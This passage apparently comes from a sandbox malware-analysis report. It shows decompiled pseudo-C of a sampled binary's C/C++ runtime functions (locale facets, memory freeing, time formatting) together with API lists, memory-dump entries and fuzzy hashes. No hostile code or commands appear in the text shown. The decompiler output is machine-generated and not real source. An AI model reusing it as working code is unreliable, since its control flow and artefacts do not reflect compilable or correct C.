                          														if(__eflags == 0) {
                          															_push( *((intOrPtr*)(_t171 + 8)));
                          															_push(_t171 - 0x10);
                          															_t97 = E0132B906(_t157, _t165, __eflags);
                          															_pop(_t144);
                          															__eflags = _t97 - 0xffffffff;
                          															if(__eflags == 0) {
                          																E012F9060();
                          																asm("int3");
                          																_push(4);
                          																E0132F1B6(0x1368ad3, __eflags);
                          																_t166 = _t144;
                          																 *(_t171 - 0x10) = _t166;
                          																 *((intOrPtr*)(_t166 + 4)) =  *((intOrPtr*)(_t171 + 0xc));
                          																_push( *((intOrPtr*)(_t171 + 8)));
                          																_t53 = _t171 - 4;
                          																 *_t53 =  *(_t171 - 4) & 0x00000000;
                          																__eflags =  *_t53;
                          																 *_t166 = 0x1376c58;
                          																E0132C81A(_t144, _t157, __eflags, _t175);
                          																return E0132F190(_t166, __eflags);
                          															} else {
                          																_t161 =  *(_t171 - 0x10);
                          																 *(_t171 - 0x10) = _t161;
                          																 *(_t171 - 4) = 1;
                          																E0131792B(__eflags, _t161);
                          																 *0x1374358();
                          																 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 4))))();
                          																 *0x13aaabc = _t161;
                          																goto L26;
                          															}
                          														} else {
                          															_t161 = _t165;
                          															goto L26;
                          														}
                          													}
                          												} else {
                          													_t160 =  *(_t171 - 0x10);
                          													 *(_t171 - 0x10) = _t160;
                          													 *(_t171 - 4) = 1;
                          													E0131792B(__eflags, _t160);
                          													 *0x1374358();
                          													 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 4))))();
                          													 *0x13aaab8 = _t160;
                          													goto L19;
                          												}
                          											} else {
                          												_t160 = _t164;
                          												goto L19;
                          											}
                          										}
                          									} else {
                          										_t159 =  *(_t171 - 0x10);
                          										 *(_t171 - 0x10) = _t159;
                          										 *(_t171 - 4) = 1;
                          										E0131792B(__eflags, _t159);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 4))))();
                          										 *0x13aaab0 = _t159;
                          										goto L12;
                          									}
                          								} else {
                          									_t159 = _t163;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t158 =  *(_t171 - 0x10);
                          							 *(_t171 - 0x10) = _t158;
                          							 *(_t171 - 4) = 1;
                          							E0131792B(__eflags, _t158);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 4))))();
                          							 *0x13aaab4 = _t158;
                          							goto L5;
                          						}
                          					} else {
                          						_t158 = _t162;
                          						goto L5;
                          					}
                          				}
                          			}

















                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B26D
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • moneypunct.LIBCPMT ref: 0132B2A7
                          • std::_Facet_Register.LIBCPMT ref: 0132B2BE
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B2DE
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B2EB
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                          • String ID:
                          • API String ID: 1973839345-0
                          • Opcode ID: 306aef2a5777d970c97a66193c737a010790088b0375ea2ee7d6682ee2f8833e
                          • Instruction ID: 814f04cff005cd958c436b3508466885335f18f5e6ae05c0472ba592f6cca38e
                          • Opcode Fuzzy Hash: 306aef2a5777d970c97a66193c737a010790088b0375ea2ee7d6682ee2f8833e
                          • Instruction Fuzzy Hash: 4D01D23691032B8BDF15FB68C5546BEBBB9BF94328F680408E6116B284CF34AD45CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B2F1(void* __eflags, void* __fp0) {
                          				signed int _t47;
                          				void* _t74;
                          				signed int _t111;
                          				void* _t121;
                          				signed int _t123;
                          				signed int _t124;
                          				signed int _t125;
                          				signed int _t126;
                          				signed int _t127;
                          				signed int _t128;
                          				void* _t132;
                          
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t132 - 0x14, 0);
                          				_t125 =  *0x13aaab0; // 0x0
                          				 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
                          				 *(_t132 - 0x10) = _t125;
                          				_t47 = E012F9A10( *((intOrPtr*)(_t132 + 8)), E012F9850(0x13aaa90));
                          				_t122 = _t47;
                          				if(_t47 != 0) {
                          					L5:
                          					E0131780E(_t132 - 0x14);
                          					return E0132F190(_t122, _t135);
                          				} else {
                          					_t135 = _t125;
                          					if(_t125 == 0) {
                          						_push( *((intOrPtr*)(_t132 + 8)));
                          						_push(_t132 - 0x10);
                          						__eflags = E0132B815(_t125, __eflags, __fp0) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t132 - 0x14, 0);
                          							_t126 =  *0x13aaab8; // 0x0
                          							 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
                          							 *(_t132 - 0x10) = _t126;
                          							_t123 = E012F9A10( *((intOrPtr*)(_t132 + 8)), E012F9850(0x13aaa98));
                          							__eflags = _t123;
                          							if(_t123 != 0) {
                          								L12:
                          								E0131780E(_t132 - 0x14);
                          								return E0132F190(_t123, __eflags);
                          							} else {
                          								__eflags = _t126;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t132 + 8)));
                          									_push(_t132 - 0x10);
                          									__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(8);
                          										E0132F1B6(0x1368615, __eflags);
                          										E013177B6(_t132 - 0x14, 0);
                          										_t127 =  *0x13aaabc; // 0x0
                          										 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
                          										 *(_t132 - 0x10) = _t127;
                          										_t124 = E012F9A10( *((intOrPtr*)(_t132 + 8)), E012F9850(0x13aaa9c));
                          										__eflags = _t124;
                          										if(_t124 != 0) {
                          											L19:
                          											E0131780E(_t132 - 0x14);
                          											return E0132F190(_t124, __eflags);
                          										} else {
                          											__eflags = _t127;
                          											if(__eflags == 0) {
                          												_push( *((intOrPtr*)(_t132 + 8)));
                          												_push(_t132 - 0x10);
                          												_t74 = E0132B906(_t121, _t127, __eflags);
                          												_pop(_t111);
                          												__eflags = _t74 - 0xffffffff;
                          												if(__eflags == 0) {
                          													E012F9060();
                          													asm("int3");
                          													_push(4);
                          													E0132F1B6(0x1368ad3, __eflags);
                          													_t128 = _t111;
                          													 *(_t132 - 0x10) = _t128;
                          													 *((intOrPtr*)(_t128 + 4)) =  *((intOrPtr*)(_t132 + 0xc));
                          													_push( *((intOrPtr*)(_t132 + 8)));
                          													_t41 = _t132 - 4;
                          													 *_t41 =  *(_t132 - 4) & 0x00000000;
                          													__eflags =  *_t41;
                          													 *_t128 = 0x1376c58;
                          													E0132C81A(_t111, _t121, __eflags, __fp0);
                          													return E0132F190(_t128, __eflags);
                          												} else {
                          													_t124 =  *(_t132 - 0x10);
                          													 *(_t132 - 0x10) = _t124;
                          													 *(_t132 - 4) = 1;
                          													E0131792B(__eflags, _t124);
                          													 *0x1374358();
                          													 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 4))))();
                          													 *0x13aaabc = _t124;
                          													goto L19;
                          												}
                          											} else {
                          												_t124 = _t127;
                          												goto L19;
                          											}
                          										}
                          									} else {
                          										_t123 =  *(_t132 - 0x10);
                          										 *(_t132 - 0x10) = _t123;
                          										 *(_t132 - 4) = 1;
                          										E0131792B(__eflags, _t123);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 4))))();
                          										 *0x13aaab8 = _t123;
                          										goto L12;
                          									}
                          								} else {
                          									_t123 = _t126;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t122 =  *(_t132 - 0x10);
                          							 *(_t132 - 0x10) = _t122;
                          							 *(_t132 - 4) = 1;
                          							E0131792B(__eflags, _t122);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 4))))();
                          							 *0x13aaab0 = _t122;
                          							goto L5;
                          						}
                          					} else {
                          						_t122 = _t125;
                          						goto L5;
                          					}
                          				}
                          			}















                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B302
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • moneypunct.LIBCPMT ref: 0132B33C
                          • std::_Facet_Register.LIBCPMT ref: 0132B353
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B373
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B380
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                          • String ID:
                          • API String ID: 1973839345-0
                          • Opcode ID: 9188411130637cd4c5b958065f397cdc9aa73f6b29e8106e6618de48d8fb988d
                          • Instruction ID: f1c4c7c8fd1f53133823df0a66ddcf1b5baed49791e6c28a72e5e547b6c6a26c
                          • Opcode Fuzzy Hash: 9188411130637cd4c5b958065f397cdc9aa73f6b29e8106e6618de48d8fb988d
                          • Instruction Fuzzy Hash: A201D63691022ACBDF15FB68C4046BEBBB9BF94728F240008DA1167284DF309D45CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0135CFCB(intOrPtr* _a4) {
                          				intOrPtr _t6;
                          				intOrPtr* _t21;
                          				void* _t23;
                          				void* _t24;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          
                          				_t21 = _a4;
                          				if(_t21 != 0) {
                          					_t23 =  *_t21 -  *0x13a4190; // 0x13a41e4
                          					if(_t23 != 0) {
                          						E01355C8F(_t7);
                          					}
                          					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x13a4194; // 0x13ab15c
                          					if(_t24 != 0) {
                          						E01355C8F(_t8);
                          					}
                          					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x13a4198; // 0x13ab15c
                          					if(_t25 != 0) {
                          						E01355C8F(_t9);
                          					}
                          					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x13a41c0; // 0x13a41e8
                          					if(_t26 != 0) {
                          						E01355C8F(_t10);
                          					}
                          					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                          					_t27 = _t6 -  *0x13a41c4; // 0x13ab160
                          					if(_t27 != 0) {
                          						return E01355C8F(_t6);
                          					}
                          				}
                          				return _t6;
                          			}











                          APIs
                          • _free.LIBCMT ref: 0135CFE3
                            • Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
                            • Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7
                          • _free.LIBCMT ref: 0135CFF5
                          • _free.LIBCMT ref: 0135D007
                          • _free.LIBCMT ref: 0135D019
                          • _free.LIBCMT ref: 0135D02B
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 331a3a2a3521c2cedfd3203fae05c96c9468d1f3d2eb26f2a2c39621e9ce6ad9
                          • Instruction ID: 20363b1e40b8e21c21e7ff0006c5cd2fb74d01a1247d17fee558bb35ebac8cab
                          • Opcode Fuzzy Hash: 331a3a2a3521c2cedfd3203fae05c96c9468d1f3d2eb26f2a2c39621e9ce6ad9
                          • Instruction Fuzzy Hash: 1DF03632608201ABDBB0DB9CF585C1A7BDDBB14F58BA81A05F94AD7545CB70F8814B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 52%
                          			E01351877(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                          				signed int _v8;
                          				short _v10;
                          				short _v12;
                          				short _v14;
                          				short _v16;
                          				short _v18;
                          				short _v22;
                          				char _v24;
                          				signed int _v28;
                          				signed int** _v32;
                          				char _v36;
                          				signed int* _v40;
                          				intOrPtr _v44;
                          				intOrPtr* _v48;
                          				intOrPtr _v52;
                          				void* _v64;
                          				void* __esi;
                          				signed int _t82;
                          				intOrPtr _t87;
                          				signed char _t90;
                          				signed int _t91;
                          				void* _t92;
                          				signed int _t93;
                          				signed int _t98;
                          				signed int _t100;
                          				signed int** _t102;
                          				signed int _t108;
                          				signed int _t111;
                          				signed int _t112;
                          				signed int _t113;
                          				void* _t115;
                          				signed int _t117;
                          				signed int _t118;
                          				signed int _t120;
                          				signed int _t122;
                          				signed int _t123;
                          				signed int _t124;
                          				intOrPtr _t135;
                          				void* _t136;
                          				signed int _t138;
                          				intOrPtr _t141;
                          				void* _t142;
                          				signed int _t144;
                          				signed int _t145;
                          				signed int* _t149;
                          				signed short* _t150;
                          				void* _t151;
                          				signed int* _t152;
                          				intOrPtr _t153;
                          				signed int _t156;
                          				signed short** _t158;
                          				signed int _t159;
                          				intOrPtr _t160;
                          				intOrPtr _t161;
                          				signed int _t162;
                          				signed int _t164;
                          				intOrPtr* _t175;
                          				signed short _t176;
                          				signed short* _t177;
                          				signed int** _t178;
                          				void* _t181;
                          				signed short* _t183;
                          				signed int _t184;
                          				signed int _t185;
                          				signed int** _t186;
                          				signed int _t187;
                          				signed int _t188;
                          
                          				_t82 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t82 ^ _t187;
                          				_t175 = _a12;
                          				_t153 = _a24;
                          				_v52 = _a4;
                          				_t149 = _a20;
                          				_v32 = _a16;
                          				_v48 = _t175;
                          				_v40 = _t149;
                          				_v44 = _t153;
                          				_t87 = _a8;
                          				if(_t87 == 0) {
                          					_t183 =  *(_t153 + 0x154);
                          				} else {
                          					if(_t87 == 1) {
                          						_t183 =  *(_t153 + 0x158);
                          					} else {
                          						_t183 =  *(_t153 + 0x15c);
                          					}
                          				}
                          				if( *((intOrPtr*)(_t153 + 0xac)) == 1) {
                          					goto L112;
                          				} else {
                          					_v24 = 0x76c +  *((intOrPtr*)(_t175 + 0x14));
                          					_v22 =  *((intOrPtr*)(_t175 + 0x10)) + 1;
                          					_v18 =  *((intOrPtr*)(_t175 + 0xc));
                          					_v16 =  *((intOrPtr*)(_t175 + 8));
                          					_v14 =  *((intOrPtr*)(_t175 + 4));
                          					_v12 =  *_t175;
                          					_v10 = 0;
                          					_t135 =  *((intOrPtr*)(_t153 + 0x160));
                          					_push(0);
                          					_push(0);
                          					if(_a8 != 2) {
                          						_push(0);
                          						_push(_t183);
                          						_push( &_v24);
                          						_push(0);
                          						_push(_t135);
                          						_t136 = E01356238();
                          					} else {
                          						_push(_t183);
                          						_push( &_v24);
                          						_push(0);
                          						_push(_t135);
                          						_t136 = E013562CE();
                          					}
                          					_t151 = _t136;
                          					if(_t151 == 0) {
                          						L31:
                          						_t149 = _v40;
                          						while(1) {
                          							L112:
                          							_t176 =  *_t183 & 0x0000ffff;
                          							__eflags = _t176;
                          							if(_t176 == 0) {
                          								break;
                          							}
                          							_t185 =  *_t149;
                          							__eflags = _t185;
                          							if(_t185 == 0) {
                          								goto L28;
                          							}
                          							_v36 = 0;
                          							_t90 = 0;
                          							__eflags = 0;
                          							_v28 = _t183;
                          							_t150 = _t183;
                          							_t156 = _t176 & 0x0000ffff;
                          							do {
                          								_t150 =  &(_t150[1]);
                          								_t90 = _t90 + 1;
                          								__eflags =  *_t150 - _t156;
                          							} while ( *_t150 == _t156);
                          							_t157 = _t176 & 0x0000ffff;
                          							_v28 = _t150;
                          							_t149 = _v40;
                          							__eflags = _t157 - 0x64;
                          							if(__eflags > 0) {
                          								_t157 = _t157 - 0x68;
                          								__eflags = _t157;
                          								if(_t157 == 0) {
                          									_t91 = _t90 - 1;
                          									__eflags = _t91;
                          									if(_t91 == 0) {
                          										_v36 = 1;
                          										L109:
                          										_push(0x49);
                          										L110:
                          										_pop(_t92);
                          										_t93 = E01350D82(_t157, _v52, _t92, _v48, _v32, _t149, _v44, _v36);
                          										_t188 = _t188 + 0x1c;
                          										__eflags = _t93;
                          										if(__eflags == 0) {
                          											 *((intOrPtr*)(E0134B45F(__eflags))) = 0x16;
                          											goto L29;
                          										}
                          										L111:
                          										_t183 = _v28;
                          										continue;
                          									}
                          									__eflags = _t91 == 1;
                          									if(_t91 == 1) {
                          										goto L109;
                          									}
                          									L107:
                          									_t158 = _v32;
                          									_t183 =  &(_t183[1]);
                          									 *( *_t158) = _t176;
                          									 *_t158 =  &(( *_t158)[1]);
                          									 *_t149 =  *_t149 - 1;
                          									continue;
                          								}
                          								_t157 = _t157 - 5;
                          								__eflags = _t157;
                          								if(_t157 == 0) {
                          									_t98 = _t90 - 1;
                          									__eflags = _t98;
                          									if(_t98 == 0) {
                          										_v36 = 1;
                          										L104:
                          										_push(0x4d);
                          										goto L110;
                          									}
                          									__eflags = _t98 == 1;
                          									if(_t98 == 1) {
                          										goto L104;
                          									}
                          									goto L107;
                          								}
                          								_t157 = _t157 - 6;
                          								__eflags = _t157;
                          								if(_t157 == 0) {
                          									_t100 = _t90 - 1;
                          									__eflags = _t100;
                          									if(_t100 == 0) {
                          										_v36 = 1;
                          										L99:
                          										_push(0x53);
                          										goto L110;
                          									}
                          									__eflags = _t100 == 1;
                          									if(_t100 == 1) {
                          										goto L99;
                          									}
                          									goto L107;
                          								}
                          								_t159 = _t157 - 1;
                          								__eflags = _t159;
                          								if(_t159 == 0) {
                          									_t160 = _v48;
                          									__eflags =  *((intOrPtr*)(_t160 + 8)) - 0xb;
                          									_t161 = _v44;
                          									if( *((intOrPtr*)(_t160 + 8)) > 0xb) {
                          										_t177 =  *(_t161 + 0x150);
                          									} else {
                          										_t177 =  *(_t161 + 0x14c);
                          									}
                          									__eflags = _t90 - 1;
                          									if(_t90 != 1) {
                          										L90:
                          										_t162 =  *_t177 & 0x0000ffff;
                          										__eflags = _t162;
                          										if(_t162 == 0) {
                          											goto L111;
                          										}
                          										_t102 = _v32;
                          										while(1) {
                          											__eflags = _t185;
                          											if(_t185 == 0) {
                          												goto L111;
                          											}
                          											_t177 =  &(_t177[1]);
                          											 *( *_t102) = _t162;
                          											_t102 = _v32;
                          											 *_t102 =  &(( *_t102)[0]);
                          											 *_t149 =  *_t149 - 1;
                          											_t162 =  *_t177 & 0x0000ffff;
                          											_t185 =  *_t149;
                          											__eflags = _t162;
                          											if(_t162 != 0) {
                          												continue;
                          											}
                          											goto L111;
                          										}
                          									} else {
                          										__eflags = _t185;
                          										if(_t185 == 0) {
                          											goto L90;
                          										}
                          										 *( *_v32) =  *_t177;
                          										 *_v32 =  &(( *_v32)[0]);
                          										 *_t149 =  *_t149 - 1;
                          									}
                          									goto L111;
                          								}
                          								_t157 = _t159 != 5;
                          								__eflags = _t159 != 5;
                          								if(_t159 != 5) {
                          									goto L107;
                          								}
                          								_t108 = _t90;
                          								__eflags = _t108;
                          								if(_t108 == 0) {
                          									_push(0x79);
                          									goto L110;
                          								}
                          								__eflags = _t108 != 0;
                          								if(_t108 != 0) {
                          									goto L107;
                          								}
                          								_push(0x59);
                          								goto L110;
                          							}
                          							if(__eflags == 0) {
                          								_t111 = _t90 - 1;
                          								__eflags = _t111;
                          								if(_t111 == 0) {
                          									_v36 = 1;
                          									L74:
                          									_push(0x64);
                          									goto L110;
                          								}
                          								_t112 = _t111 - 1;
                          								__eflags = _t112;
                          								if(_t112 == 0) {
                          									goto L74;
                          								}
                          								_t113 = _t112 - 1;
                          								__eflags = _t113;
                          								if(_t113 == 0) {
                          									_push(0x61);
                          									goto L110;
                          								}
                          								__eflags = _t113 != 1;
                          								if(_t113 != 1) {
                          									goto L107;
                          								}
                          								_push(0x41);
                          								goto L110;
                          							}
                          							__eflags = _t157 - 0x27;
                          							if(_t157 == 0x27) {
                          								_t183 =  &(_t183[_t90]);
                          								__eflags = _t90 & 0x00000001;
                          								if((_t90 & 0x00000001) == 0) {
                          									continue;
                          								}
                          								_t164 =  *_t183 & 0x0000ffff;
                          								__eflags = _t164;
                          								if(_t164 == 0) {
                          									goto L28;
                          								}
                          								_t178 = _v32;
                          								while(1) {
                          									__eflags = _t185;
                          									if(_t185 == 0) {
                          										goto L112;
                          									}
                          									_t115 = 0x27;
                          									_t183 =  &(_t183[1]);
                          									__eflags = _t164 - _t115;
                          									if(_t164 == _t115) {
                          										goto L112;
                          									}
                          									 *( *_t178) = _t164;
                          									 *_t178 =  &(( *_t178)[0]);
                          									 *_t149 =  *_t149 - 1;
                          									_t164 =  *_t183 & 0x0000ffff;
                          									_t185 =  *_t149;
                          									__eflags = _t164;
                          									if(_t164 != 0) {
                          										continue;
                          									}
                          									goto L112;
                          								}
                          								continue;
                          							}
                          							__eflags = _t157 - 0x41;
                          							if(_t157 == 0x41) {
                          								L42:
                          								_t117 = E0135B52B(_t183, _t185, _t183, L"am/pm");
                          								__eflags = _t117;
                          								if(_t117 != 0) {
                          									_t118 = E0135B52B(_t183, _t185, _t183, L"a/p");
                          									_pop(_t157);
                          									__eflags = _t118;
                          									if(_t118 == 0) {
                          										_v28 =  &(_t183[3]);
                          									}
                          								} else {
                          									_t157 =  &(_t183[5]);
                          									_v28 =  &(_t183[5]);
                          								}
                          								_push(0x70);
                          								goto L110;
                          							}
                          							__eflags = _t157 - 0x48;
                          							if(_t157 == 0x48) {
                          								_t120 = _t90 - 1;
                          								__eflags = _t120;
                          								if(_t120 == 0) {
                          									_v36 = 1;
                          									L56:
                          									_push(0x48);
                          									goto L110;
                          								}
                          								__eflags = _t120 == 1;
                          								if(_t120 == 1) {
                          									goto L56;
                          								}
                          								goto L107;
                          							}
                          							__eflags = _t157 - 0x4d;
                          							if(_t157 == 0x4d) {
                          								_t122 = _t90 - 1;
                          								__eflags = _t122;
                          								if(_t122 == 0) {
                          									_v36 = 1;
                          									L51:
                          									_push(0x6d);
                          									goto L110;
                          								}
                          								_t123 = _t122 - 1;
                          								__eflags = _t123;
                          								if(_t123 == 0) {
                          									goto L51;
                          								}
                          								_t124 = _t123 - 1;
                          								__eflags = _t124;
                          								if(_t124 == 0) {
                          									_push(0x62);
                          									goto L110;
                          								}
                          								__eflags = _t124 != 1;
                          								if(_t124 != 1) {
                          									goto L107;
                          								}
                          								_push(0x42);
                          								goto L110;
                          							}
                          							__eflags = _t157 - 0x61;
                          							if(_t157 != 0x61) {
                          								goto L107;
                          							}
                          							goto L42;
                          						}
                          						goto L28;
                          					} else {
                          						_t33 = _t151 + _t151 + 8; // 0x8
                          						asm("sbb eax, eax");
                          						_t138 = _t151 + _t151 & _t33;
                          						if(_t138 == 0) {
                          							_t185 = 0;
                          							__eflags = 0;
                          							L18:
                          							_v28 = _t185;
                          							if(_t185 == 0) {
                          								L30:
                          								E0131C983(0);
                          								goto L31;
                          							}
                          							_t141 =  *((intOrPtr*)(_v44 + 0x160));
                          							if(_a8 != 2) {
                          								_t142 = E01356238(_t141, 0,  &_v24, _t183, _t185, _t151, 0);
                          							} else {
                          								_t142 = E013562CE(_t141, 0,  &_v24, _t183, _t185, _t151);
                          							}
                          							_t184 = _t185;
                          							_t181 = _t142 - 1;
                          							if(_t181 <= 0) {
                          								L27:
                          								E0131C983(_t185);
                          								L28:
                          								L29:
                          								return E0132EA79(_v8 ^ _t187, _t185);
                          							} else {
                          								_t152 = _v40;
                          								_t186 = _v32;
                          								_t144 =  *_t152;
                          								while(_t144 != 0) {
                          									_t145 =  *_t184;
                          									_t184 = _t184 + 2;
                          									 *( *_t186) = _t145;
                          									 *_t186 =  &(( *_t186)[0]);
                          									 *_t152 =  *_t152 - 1;
                          									_t181 = _t181 - 1;
                          									_t144 =  *_t152;
                          									if(_t181 > 0) {
                          										continue;
                          									}
                          									break;
                          								}
                          								_t185 = _v28;
                          								goto L27;
                          							}
                          						}
                          						if(_t138 > 0x400) {
                          							_t185 = E013576ED(_t138);
                          							_v28 = _t185;
                          							__eflags = _t185;
                          							if(_t185 == 0) {
                          								goto L30;
                          							}
                          							 *_t185 = 0xdddd;
                          							L14:
                          							_t185 = _t185 + 8;
                          							goto L18;
                          						}
                          						E0132F420();
                          						_t185 = _t188;
                          						_v28 = _t185;
                          						if(_t185 == 0) {
                          							goto L30;
                          						}
                          						 *_t185 = 0xcccc;
                          						goto L14;
                          					}
                          				}
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: __freea
                          • String ID: a/p$am/pm
                          • API String ID: 240046367-3206640213
                          • Opcode ID: 0d5e50247115c8751ce870f6dd09abb5be205527ed99982196e3514591bf444a
                          • Instruction ID: b109ea74c381203535da066e27eb0376ea2457b28331286444b570bfb211e05e
                          • Opcode Fuzzy Hash: 0d5e50247115c8751ce870f6dd09abb5be205527ed99982196e3514591bf444a
                          • Instruction Fuzzy Hash: BEC1F07590020ADBEFA59F6CC884FBABBB4FF06F18F144149EE01AB650D3769941CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 01347FE0
                          • PMDtoOffset.LIBCMT ref: 01348006
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: FindInstanceOffsetTargetType
                          • String ID: Bad dynamic_cast!
                          • API String ID: 2363274979-2956939130
                          • Opcode ID: 01a89e2e7acd2f314a2468924e498f82b71b61551440b0ea99f884732bd8953e
                          • Instruction ID: 7ac91b63fa61c0bc11b46a540ecc35bb4634498019c96fe09859d3936c58bef9
                          • Opcode Fuzzy Hash: 01a89e2e7acd2f314a2468924e498f82b71b61551440b0ea99f884732bd8953e
